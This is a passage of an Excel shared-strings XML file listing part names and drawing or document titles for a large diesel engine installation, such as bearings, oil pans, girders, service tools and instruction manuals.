    <t>CHAIN TAB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Hydraulic Cylinder Unit (HCU)</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COOLING JACKET, PROTECT. SHIELD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL PANEL, WIRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER CONTROL, WIRING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HYDRAULIC POWER SUPPLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">HYDRAULIC OIL FILTER  </t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Umbrella,drain pipe</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTALLATION DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DRIVE, UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE LISTS,CUTTING PLANS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE SHOE/STRIP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PISTON+ROD+STUFFING BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXHAUST VALVE COMPLETE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS INJECTION VALVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONTROL OIL PRES. PIPES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CABLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUMENTATION, STANDARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL PUMP WITH ACTUATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. OF REGULATING SHAFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AUTOMATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MECHATRONIC INJ.CONTR.SYS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CONTROL EQUIPMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASIC GAS SAFETY SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TCS AND/OR PTO SYSTEMS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INDICATOR DRIVE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TUNING AND TURNING WHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF CHARGING AIR PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN PIPE,CYL.LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF AUXILIARY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL PIPE, IN-+OUTLET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GAS PIPES ARR.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES, CYL.COVER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>VARIOUS PIPES, CYL.FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK./PIPE,UP. REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACK./PIPE,CNT.REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GALL.BRACKETS+PIPES,INTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.,UPPER,REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR.,CENTER,REAR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATFORM ARR. CENTER MAN.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLASS SPARES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADDITIONAL SPARES</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPES, ST.AIR DISTRIBUTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STARTING AIR DISTRIBUTOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FIRE EXTING. IN SCAV.BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MC MAIN ASSEMBLY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGNMENT ETC., BWMASK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYLINDER COVER, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIST.+ROD+STUFF.BOX,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CYL.LINER AND LUBRICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSSHEAD+CONN.ROD, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CRANKSH.+THRUST BRG,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MECH.CONTROL GEAR, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUEL OIL SYSTEM, TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ASS. OF LARGE PARTS,TOOLS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ENGINE ROOM CRANE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR EPOXY CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR SOLID CHOCKS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TOOLS FOR MS 926</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STATIONARY INSTALLATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MARINE INSTALLATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIST OF SPECIFICATIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ELECTRONIC SYSTEM DOCUMENTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UG-Family_Master_Part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>UG basic cyl., block</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FREQUENCY CONVERTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EGR + HAM   TEGLHOLMEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EGR+HAM TEGLHOLMEN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STRAIN GAUGE MEASUREMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Counter flanges, flex.conn.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ANGLE-IRON FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr.-/Install. CD-ROM - Stand.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr.-/Install. CD-ROM - Plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAY TANK, DIFF. DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Inspection sheet</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Technical files</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft control diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Orifice diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Genset requirement specification</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr.-/Install. Manual - Stand.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instr.-/Install. Manual - Plant</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Picking list</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Picking instruction</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Pick list, spare kit</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Instruction book, Plant specific</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CD-rom, Plant specific</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CaMShaft timing diagram</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MEASURING SCHEME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ADJUSTING OF VALVE CLEARANCE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONCRETE FOUNDATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEAT BALANCE COOL. WATER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLANT SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DATA F. ELASTIC MOUNTING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GENERAL ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEX.EXTERNAL CONNECTIONS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PIPE ARRANGEMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTALLATION DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SHAFT DIM. FOR ALTERNATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>POWER PLANT SPECIFICATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INSTRUCTION MANUAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMPRESSED AIR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COMBUSTION AIR SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SLUDGE SYSTEM</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Combustion space</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BUILDING LAYOUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING OF DIPSTICK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OUTLINE DRAWING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAWINGS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SUPPORT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SUPPORT-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SUPPORT-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS GIRDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LONGITUDINAL GIRDER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS GIRDER CYL. UNIT, WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS GIRDER FORE, WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS GIRDER AFT, WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CR. GIRDER, THRUST BEARING WELD.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CROSS GIRDER JOURNAL, WELDED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL VIBRATION DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL VIBR.DAMPER,UPPER P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXIAL VIBR.DAMPER,LOWER P</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil seal, axial vibration damper</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD F.AXIAL VIBR.DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RESTRICTION FOR DAMPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DAMPER-OIL PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROXIMETER-ELECTRONIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROXIMETER PROBE-ELECTRON</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RUN-OUT METER-ELECTRONIC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END CHOCK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOOT PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WEB PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RIB</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRAIN PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CLEARANCE, MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING UPPER SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING LOWER SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BEARING SHELL-UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUIDE BEARING SHELL-LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE MET.GUIDE BRG.UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE MET.GUIDE BRG.LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXPERIMENT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JOURN.BEARING UPPER SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE MET.JOURN.BRG.UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WHITE MET.JOURN.BRG.LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>JOURNAL BEARING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PAN-SECTIONAL VIEW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIPSTICK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIVER-Y56F</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PUMP STATION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DETAIL FOR OIL PAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ALIGNMENT SCREW</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISC</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>WELDING-ON NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BLANK FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUND STEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GEAR HOUSING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BOTTOM FLANGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BATTEN PLATE BY FLYWHEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET, LUB. OIL COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BAFFLE PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECTANGULAR HOLLOW SEC.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR LUB. FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FILLING PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION PIPE F. SEPARATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL - ANTIVIBRA.MOUNT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNT.OF FOUNDATION BOLTS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL LEVEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Rubber element for conical</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Accessories f. dry sump arr.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Shell plate, oil pan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Aft plate, oil pan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Front plate, oil pan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Intermediate plate, oil pan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil pan, assembly</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD F. PULLEY F. MAIN.B.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT. TOOL, MAIN BRG.CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DISM. TOOL,MAIN BRG SHELL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRIDGE GAUGE-MAIN BEARING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TIGHTN.TEMPLATE A.V.D.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BORING TOOL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SPINDLE FOR DRILLING MACH</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING UPPER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING LOWER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BASEPLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TEMPLATE TO MAGNET FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF MAGNETIC FILTER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SOUNDING SCHEDULE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MOUNTING INSTRUCTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ROUNDSTEEL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>KEY</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOUNDATION FRAME MACH.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DIAGRAM FOR OIL PAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DRIP PLATE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOUNDATION FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACKET FOR PLATE COOLER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>AXLE JOURNAL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>RECTANGUL. HOLLOW SECTION</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LUB. OIL SUCTION PIPE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOLDER FOR DIPSTICK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUCTION PIPE F. SEPERATOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTING CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>OIL PAN MACHINED</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HEX.SOC.LOW HEAD CAP SCRE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CONICAL ANTI-VIBR. MOUNT.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FOUNDATION RAIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HANDLE FOR DIPSTICK</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>A-FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERM.FRAME-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>INTERM.FRAME-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>REARSIDE-DRILLING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTING PLAN FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HINGE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HINGE ROD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER - UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER - LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOOR FRAME</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DOOR</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PLATE F. TRIANGULAR TUBE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain pipe, Complete</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT-UPPER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT-LOWER PART</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT NUT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SUPPORT PIECE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Protective cap for stay bolt</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>STAY BOLT DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>BRACING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>HOUSING FOR BRACING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE BOX-FORE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE BOX-AFT</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PACKING, SCAVENGE BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>END SHIELD, SCAVENGE. BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>CUTTING PLAN</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FUNNEL-PISTON COOLING OIL</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>PROTECTIVE GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Drain pipe, piston cooling</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SEALING RING</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>SCAVENGE BOX, DETAILS</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>ER DER TEGNINGER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>NUT FOR MAIN BEARING STUD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>EXTENSION SOCKET</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD FORE END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>GUARD</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER ON EXHAUST SIDE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>TERMINAL BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Remachining for mount. of sensor</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING,TIN-ALU</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>MAIN BEARING,LEAD-BRONZE</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER FOR FLYWHEEL END</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>COVER-AIR CHAMBER</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil collecting pan, ass.</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Oil collecting pan</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Plate part</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Crankcase oil temp. monitoring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Thrust ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Tierod</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>DETAIL FOR PROTECTIVE CAP</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>LIFT.ATTACHMT.F.FRAME BOX</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main bearing, axial</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Main bearing, oversize</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Frame with caMShaft bearing</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>Mounting of clamping ring</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
